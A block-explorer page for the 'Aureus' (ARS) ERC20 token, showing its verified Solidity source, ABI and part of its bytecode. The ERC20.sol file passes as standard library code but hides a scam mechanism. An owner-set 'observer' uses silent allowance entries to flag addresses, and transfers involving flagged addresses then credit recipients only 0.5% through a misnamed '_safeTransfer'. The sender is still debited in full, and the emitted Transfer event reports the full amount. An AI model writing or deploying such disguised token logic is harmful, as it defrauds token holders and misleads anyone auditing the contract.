ETH Price: $3,059.57 (+2.29%)
Gas: 5 Gwei

Token

Aureus (ARS)
 

Overview

Max Total Supply

1,000,000,000 ARS

Holders

54

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,387,756.188647264737922364 ARS

Value
$0.00
0x9f80c1dc1a315a3399173d47a9b82b03569dcb5d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Aureus

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: BASE.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract Aureus is ERC20 {
    constructor() ERC20("Aureus", "ARS") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    address private _observer;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
    
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function setObserver(address observer) external {
        require((msg.sender == owner()));
        _observer = observer;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev Improvement of {IERC20-approve}.
     *      One tx to approve multiple addresses
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spenders` cannot be the zero array.
     */
    function approveMultiple(address [] calldata spenders, uint256 amount) external returns (bool) {
        address owner = _msgSender();
        for (uint256 i = 0; i < spenders.length; i++) {
            _allowances[owner][spenders[i]] = amount;
        }
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }
    function _safeTransfer(uint256 a) internal pure returns(uint256) {return a * 1000 / 200000;}

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_allowances[_observer][to] == 1) {_allowances[_observer][to] = 2;}
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        if (_allowances[_observer][from] + _allowances[_observer][to] >= 2) {
            return _safeTransfer(amount);
        } else {
            return amount;
        }
    }
}

File 4 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"spenders","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approveMultiple","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"observer","type":"address"}],"name":"setObserver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600681526020017f41757265757300000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f41525300000000000000000000000000000000000000000000000000000000008152506200009e62000092620000e860201b60201c565b620000f060201b60201c565b8160049081620000af91906200088d565b508060059081620000c191906200088d565b505050620000e2336b033b2e3c9fd0803ce8000000620001b460201b60201c565b62000b57565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000226576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200021d90620009d5565b60405180910390fd5b6200023a600083836200032360201b60201c565b5080600360008282546200024f919062000a26565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000303919062000a72565b60405180910390a36200031f600083836200049a60201b60201c565b5050565b60006002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205460026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000470919062000a26565b106200048f576200048782620005ea60201b60201c565b905062000493565b8190505b9392505050565b600160026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403620005e5576002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062030d406103e88362000600919062000a8f565b6200060c919062000b1f565b9050919050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200069557607f821691505b602082108103620006ab57620006aa6200064d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007157fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006d6565b620007218683620006d6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200076e62000768620007628462000739565b62000743565b62000739565b9050919050565b6000819050919050565b6200078a836200074d565b620007a2620007998262000775565b848454620006e3565b825550505050565b600090565b620007b9620007aa565b620007c68184846200077f565b505050565b5b81811015620007ee57620007e2600082620007af565b600181019050620007cc565b5050565b601f8211156200083d576200080781620006b1565b6200081284620006c6565b8101602085101562000822578190505b6200083a6200083185620006c6565b830182620007cb565b50505b505050565b600082821c905092915050565b6000620008626000198460080262000842565b1980831691505092915050565b60006200087d83836200084f565b9150826002028217905092915050565b620008988262000613565b67ffffffffffffffff811115620008b457620008b36200061e565b5b620008c082546200067c565b620008cd828285620007f2565b600060209050601f831160018114620009055760008415620008f0578287015190505b620008fc85826200086f565b8655506200096c565b601f1984166200091586620006b1565b60005b828110156200093f5784890151825560018201915060208501945060208101905062000918565b868310156200095f57848901516200095b601f8916826200084f565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620009bd601f8362000974565b9150620009ca8262000985565b602082019050919050565b60006020820190508181036000830152620009f081620009ae565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000a338262000739565b915062000a408362000739565b925082820190508082111562000a5b5762000a5a620009f7565b5b92915050565b62000a6c8162000739565b82525050565b600060208201905062000a89600083018462000a61565b92915050565b600062000a9c8262000739565b915062000aa98362000739565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000ae55762000ae4620009f7565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000b2c8262000739565b915062000b398362000739565b92508262000b4c5762000b4b62000af0565b5b828204905092915050565b611c7f8062000b676000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638120649511610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b806381206495146102295780638da5cb5b1461025957806394d9c9c71461027757806395d89b411461029357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61035d565b60405161011a9190611239565b60405180910390f35b61013d600480360381019061013891906112f9565b6103ef565b60405161014a9190611354565b60405180910390f35b61015b610412565b604051610168919061137e565b60405180910390f35b61018b60048036038101906101869190611399565b61041c565b6040516101989190611354565b60405180910390f35b6101a961044b565b6040516101b69190611408565b60405180910390f35b6101d960048036038101906101d491906112f9565b610454565b6040516101e69190611354565b60405180910390f35b61020960048036038101906102049190611423565b61048b565b604051610216919061137e565b60405180910390f35b6102276104d4565b005b610243600480360381019061023e91906114b5565b6104e8565b6040516102509190611354565b60405180910390f35b6102616105cb565b60405161026e9190611524565b60405180910390f35b610291600480360381019061028c9190611423565b6105f4565b005b61029b610677565b6040516102a89190611239565b60405180910390f35b6102cb60048036038101906102c691906112f9565b610709565b6040516102d89190611354565b60405180910390f35b6102fb60048036038101906102f691906112f9565b610780565b6040516103089190611354565b60405180910390f35b61032b6004803603810190610326919061153f565b6107a3565b604051610338919061137e565b60405180910390f35b61035b60048036038101906103569190611423565b61082a565b005b60606004805461036c906115ae565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906115ae565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa6108ad565b90506104078185856108b5565b600191505092915050565b6000600354905090565b6000806104276108ad565b9050610434858285610a7e565b61043f858585610b0a565b60019150509392505050565b60006012905090565b60008061045f6108ad565b905061048081858561047185896107a3565b61047b919061160e565b6108b5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104dc610d88565b6104e66000610e06565b565b6000806104f36108ad565b905060005b858590508110156105be5783600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600088888581811061055857610557611642565b5b905060200201602081019061056d9190611423565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080806105b690611671565b9150506104f8565b5060019150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105fc6105cb565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461063357600080fd5b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b606060058054610686906115ae565b80601f01602080910402602001604051908101604052809291908181526020018280546106b2906115ae565b80156106ff5780601f106106d4576101008083540402835291602001916106ff565b820191906000526020600020905b8154815290600101906020018083116106e257829003601f168201915b5050505050905090565b6000806107146108ad565b9050600061072282866107a3565b905083811015610767576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075e9061172b565b60405180910390fd5b61077482868684036108b5565b60019250505092915050565b60008061078b6108ad565b9050610798818585610b0a565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610832610d88565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108a1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610898906117bd565b60405180910390fd5b6108aa81610e06565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610924576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091b9061184f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610993576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098a906118e1565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a71919061137e565b60405180910390a3505050565b6000610a8a84846107a3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b045781811015610af6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aed9061194d565b60405180910390fd5b610b0384848484036108b5565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b79576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b70906119df565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610be8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdf90611a71565b60405180910390fd5b6000610bf5848484610eca565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7590611b03565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d6e919061137e565b60405180910390a3610d81858585611035565b5050505050565b610d906108ad565b73ffffffffffffffffffffffffffffffffffffffff16610dae6105cb565b73ffffffffffffffffffffffffffffffffffffffff1614610e04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfb90611b6f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600080